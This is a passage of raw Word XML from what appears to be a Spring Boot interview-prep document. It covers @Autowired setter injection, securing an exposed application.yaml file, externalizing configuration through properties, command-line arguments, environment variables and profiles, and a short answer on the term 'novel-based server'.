      </w:r>
    </w:p>
    <w:p w14:paraId="698690DE" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A708A6F"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final UserRepository userRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7BB2D7" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7688DF3C"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7BE8E7D2"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UserService(UserRepository userRepository) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31125A34"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his.userRepository = userRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281B3A8F"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7A2463C"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76D2DCE" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05"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Setter Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62833903"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2F079F"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UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A444F4E" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A3366F"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UserRepository userRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256C04A9" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFB940C"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3D6B633B"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setUserRepository(UserRepository userRepository) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCAA43A"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his.userRepository = userRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080B1E17"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2D8E03BE"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3C324A05" w14:textId="77777777" w:rsidR="008B2A0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BAECC9A">
          <v:rect id="_x0000_i2719" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E6BEB" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A0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Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8F08DD"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By default, @Autowired injects </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>by type</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0953CEBF"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f multiple beans of the same type are available, use @Qualifier to specify which one to inject.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2F1B4C"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f a bean is </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not found</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, it throws NoSuchBeanDefinitionException. Use @Autowired(required = false) to make it optional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A95F0D8" w14:textId="053D42FE"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0FE422C">
          <v:rect id="_x0000_i2720" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26300B93" w14:textId="60EA02CF" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00395B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="657" w:name="_Toc196308137"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can we handle a yaml file when it is exposed</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="657"/>
    </w:p>
    <w:p w14:paraId="4C87B0AE" w14:textId="63E6C0F9" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05"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o handle an exposed application.yaml file securely in a Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C91F180" w14:textId="77777777" w:rsidR="008B2A0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98AC523">
          <v:rect id="_x0000_i2721" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA6E13" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A0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1. Avoid Exposing It at All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8DC00C"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Never commit sensitive data (like DB passwords, tokens, keys) in version control (GitHub, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D4A79"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e .gitignore for environment-specific yaml files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EEF40D" w14:textId="77777777" w:rsidR="008B2A0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BB98763">
          <v:rect id="_x0000_i2722" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14156660" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A0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2. Use External Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14052793"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Keep application.yaml outside the packaged JAR/WAR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CBFCCF"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e --spring.config.location during deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AE52D6"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java -jar app.jar --spring.config.location=file:/opt/config/application.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AACBA13" w14:textId="77777777" w:rsidR="008B2A0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8BB93C">
          <v:rect id="_x0000_i2723" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6B5F0A" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A0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3. Encrypt Sensitive Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529F173"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e Spring Cloud Config or Jasypt encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520BB6C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C2CE44"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datasource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036FCABE"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assword: ENC(encryptedValueHere)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C18BCD"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n decrypt via Jasypt starter or a decryption bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061D1AD5" w14:textId="77777777" w:rsidR="008B2A0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64DE53A">
          <v:rect id="_x0000_i2724" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="259B0B76" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A0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4. Secure Application Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48137C8B"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strict access to /resources/, /config/ folders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9DAFB2"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revent static access to .yaml or .properties via Spring Boot’s WebSecurityConfigurerAdapter or equivalent filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A1947" w14:textId="77777777" w:rsidR="008B2A0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55F9EE9">
          <v:rect id="_x0000_i2725" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B589BEC" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A0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5. Set File Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41629290"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sure only the deployment user has access to the yaml file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D7274"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hmod 600 application.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3CCBAC" w14:textId="77777777" w:rsidR="008B2A0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0603D5F">
          <v:rect id="_x0000_i2726" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E3EF4" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A0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6. Use Environment Variables Instead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A1FCB2"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void putting secrets in YAML—override using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67FB47"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_DATASOURCE_PASSWORD=your-secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661F98A0" w14:textId="77777777" w:rsidR="008B2A05"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1F0822">
          <v:rect id="_x0000_i2727" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="652F170D" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05"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Best Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A944143"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Use application.yaml only for </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-sensitive</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environment-agnostic configs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Store secrets in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049884A1"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Vault (HashiCorp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A24CD6E"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WS/GCP Secret Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9F6F7"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ncrypted Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB41AD3" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A0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Need help encrypting YAML fields or setting up Jasypt?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6BFAF8" w14:textId="5F9D2DCE"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7277416">
          <v:rect id="_x0000_i2728" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="480D452A" w14:textId="650ABC69" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF257B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="658" w:name="_Toc196308138"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to externalize variables in spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="658"/>
    </w:p>
    <w:p w14:paraId="618CDA8B" w14:textId="08074ECD" w:rsidR="007A17C9" w:rsidRPr="002C6305" w:rsidRDefault="007A17C9"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 Spring Boot, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>externalize variables</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to separate configuration from code, making your app more flexible across environments. Here's how you can do it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A8F22A" w14:textId="77777777" w:rsidR="007A17C9"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2C1C918">
          <v:rect id="_x0000_i2729" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="335F3623" w14:textId="77777777" w:rsidR="007A17C9" w:rsidRPr="002C6305" w:rsidRDefault="007A17C9"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1. Using application.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ACA060"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pplication.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07915D8B"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pp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBE48BA"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name: MySpringApp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F9005C"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version: 1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8F7568"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age in code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D97E229"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Value("${app.name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CC0E65"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rivate String appName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5107D1" w14:textId="77777777" w:rsidR="007A17C9"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F4C8FFD">
          <v:rect id="_x0000_i2730" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A5AF93" w14:textId="77777777" w:rsidR="007A17C9" w:rsidRPr="002C6305" w:rsidRDefault="007A17C9"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2. Using @ConfigurationProperties (recommended for grouping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474D5B4A"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pplication.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB40B42"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ustom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F20D9F6"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pi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A569D4B"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key: abc123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DD0183"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imeout: 5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548FF26E"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Java class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315438C2"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0712394E"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ationProperties(prefix = "custom.api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D1C1B"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ApiConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9C2F8C"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String key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D8CB5F"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int timeout;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF0096" w14:textId="77777777" w:rsidR="007A17C9" w:rsidRPr="002C6305" w:rsidRDefault="007A17C9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C644BF"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getters &amp; setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11482D74"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19047B5B" w14:textId="77777777" w:rsidR="007A17C9"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3C908A">
          <v:rect id="_x0000_i2731" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFD1F15" w14:textId="77777777" w:rsidR="007A17C9" w:rsidRPr="002C6305" w:rsidRDefault="007A17C9"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3. Command-line arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189E5E58"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java -jar app.jar --server.port=8082 --custom.api.key=xyz987</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E961729" w14:textId="77777777" w:rsidR="007A17C9"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981B761">
          <v:rect id="_x0000_i2732" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F03346C" w14:textId="77777777" w:rsidR="007A17C9" w:rsidRPr="002C6305" w:rsidRDefault="007A17C9"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4. Environment variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FED360"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port SERVER_PORT=9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FFCFEF"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port CUSTOM_API_KEY=envKey123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8D74C"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 Boot automatically maps these to properties (hyphen becomes dot, uppercase becomes lowercase).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC83F6D" w14:textId="77777777" w:rsidR="007A17C9"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064D563">
          <v:rect id="_x0000_i2733" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C35F0A5" w14:textId="77777777" w:rsidR="007A17C9" w:rsidRPr="002C6305" w:rsidRDefault="007A17C9"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5. External application.yml/.properties file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DBEAF"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lace it outside the JAR and use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33692A20"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java -jar app.jar --spring.config.location=file:/opt/config/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6481CC7D" w14:textId="77777777" w:rsidR="007A17C9" w:rsidRPr="002C6305" w:rsidRDefault="00000000" w:rsidP="002C63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75B05F0">
          <v:rect id="_x0000_i2734" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="628EC075" w14:textId="77777777" w:rsidR="007A17C9" w:rsidRPr="002C6305" w:rsidRDefault="007A17C9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. Profile-specific files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197A3BAC"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e multiple files like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014FEFEF"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pplication-dev.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B44B02"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pplication-prod.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AE8BDC"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ctivate with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083826CE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3562EF"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ofiles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34214A36" w14:textId="77777777" w:rsidR="007A17C9" w:rsidRPr="002C6305" w:rsidRDefault="007A17C9"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ctive: dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C28B5EE" w14:textId="77777777" w:rsidR="007A17C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007A17C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9FFB342">
          <v:rect id="_x0000_i2735" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6164CA1B" w14:textId="4B0CCDD1" w:rsidR="00E64CA1" w:rsidRPr="00CE4B95"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75D22CB">
          <v:rect id="_x0000_i2736" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="254AFF3F" w14:textId="64F613ED" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF445E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="659" w:name="_Toc196308139"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a novel based server</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="659"/>
    </w:p>
    <w:p w14:paraId="19BB5D4B" w14:textId="7644C88A" w:rsidR="002C4D65" w:rsidRPr="002C6305" w:rsidRDefault="002C4D65"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>novel-based server</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doesn't appear to be a standard or widely recognized term in computer science or software development. It's possible that there might be a misunderstanding or a typo in the phrase. However, there are a few interpretations that could be relevant based on the context in which you encountered the term:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F6B48D" w14:textId="77777777" w:rsidR="002C4D65" w:rsidRPr="002C6305" w:rsidRDefault="002C4D6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Novel Approach to Servers</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If you meant a "novel" approach to server design, this could refer to a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new or innovative method</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for building or structuring a server, particularly one that diverges from traditional architectures. This could involve the use of newer technologies or frameworks, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices</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serverless architecture</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event-driven systems</w:t>
      </w:r>
